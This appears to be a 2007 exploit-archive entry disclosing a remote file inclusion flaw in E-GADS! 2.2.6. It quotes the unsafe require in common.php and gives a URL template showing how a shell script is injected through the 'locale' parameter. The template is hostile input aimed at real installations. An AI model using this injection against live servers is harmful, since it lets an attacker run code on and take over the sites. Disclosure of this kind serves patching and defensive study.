id: 1825
date: 05/03/2007
title: E-GADS! 2.2.6 (common.php locale) Remote File Inclusion Vulnerability
author: kezzap66345
cves: 

=====================================================================
E-GADS! 2.2.6 (common.php locale) Remote File Inclusion Vulnerability
=====================================================================



#############################################################################
#############################################################################
#E-GADS! 2.2.6 Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
#############################################################################
#
#ERROR:common.php
#
# require ("$locale/locale.php");
#
#BUG:
#
#Example:http://site.com/path/common.php?locale=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk#####################
#############################################################################
#############################################################################



#  0day.today [2023-03-25]  #